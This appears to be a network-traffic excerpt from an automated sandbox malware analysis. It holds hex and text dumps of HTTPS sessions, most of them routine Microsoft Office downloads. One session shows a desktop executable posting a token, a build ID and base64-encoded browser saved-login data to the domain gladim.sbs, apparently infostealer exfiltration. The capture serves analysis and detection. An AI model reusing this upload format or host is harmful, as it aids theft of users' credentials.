                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:30 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      57192.168.2.104977813.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:29 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:29 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 425
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                                                      x-ms-request-id: cb9203b6-501e-0029-2691-3fd0b8000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213829Z-174f7845968frfdmhC1EWRxxbw00000012400000000039um
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:29 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      58192.168.2.104978223.218.208.109443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:29 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                      Range: bytes=0-2147483646
                                                                                                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                                                                                                                                      2024-11-30 21:38:30 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                      ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                      X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=77856
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:30 GMT
                                                                                                                                                                                                                                                      Content-Length: 55
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      X-CID: 2
                                                                                                                                                                                                                                                      2024-11-30 21:38:30 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      59192.168.2.104977913.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:29 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:30 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 475
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                                                      x-ms-request-id: e4738428-701e-006f-2050-41afc4000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213830Z-174f7845968pght8hC1EWRyvxg000000051g00000000m0xv
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:30 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      60192.168.2.104978013.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:30 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:30 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 448
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                                                      x-ms-request-id: 8322dc88-e01e-00aa-270b-42ceda000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213830Z-174f7845968xlwnmhC1EWR0sv800000011v00000000085wx
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:30 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      61192.168.2.104978113.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:30 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:30 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 491
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                                                      x-ms-request-id: d392c6ed-201e-0033-72af-42b167000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213830Z-174f7845968psccphC1EWRuz9s00000012b0000000001y2m
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:30 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      62192.168.2.104978313.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:30 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:30 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 416
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                                                      x-ms-request-id: 6da3e3c6-601e-0084-52b4-426b3f000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213830Z-174f78459685m244hC1EWRgp2c00000011xg000000002ff2
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:30 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      63192.168.2.104978594.130.210.714437496C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:31 UTC319OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEG
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                      Host: gladim.sbs
                                                                                                                                                                                                                                                      Content-Length: 55081
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      2024-11-30 21:38:31 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 31 64 61 39 61 65 61 38 30 61 37 38 33 35 61 64 65 33 31 37 64 37 66 65 38 61 63 61 35 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 65 30 30 61 61 35 30 32 65 37 39 61 35 62 36 63 35 34 62 66 63 36 61 33 32 33 31 61 33 62 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                      Data Ascii: ------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="token"851da9aea80a7835ade317d7fe8aca55------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="build_id"5e00aa502e79a5b6c54bfc6a3231a3b5------HJJJDAEGIDHCBFHJJJEGCont
                                                                                                                                                                                                                                                      2024-11-30 21:38:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:31 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:31 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:32 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:32 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-11-30 21:38:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      64192.168.2.104978613.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:31 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:32 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:31 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 479
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                                                      x-ms-request-id: 0fbdb1d5-101e-0079-0270-435913000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213831Z-174f7845968frfdmhC1EWRxxbw000000124g0000000025an
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_MISS
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
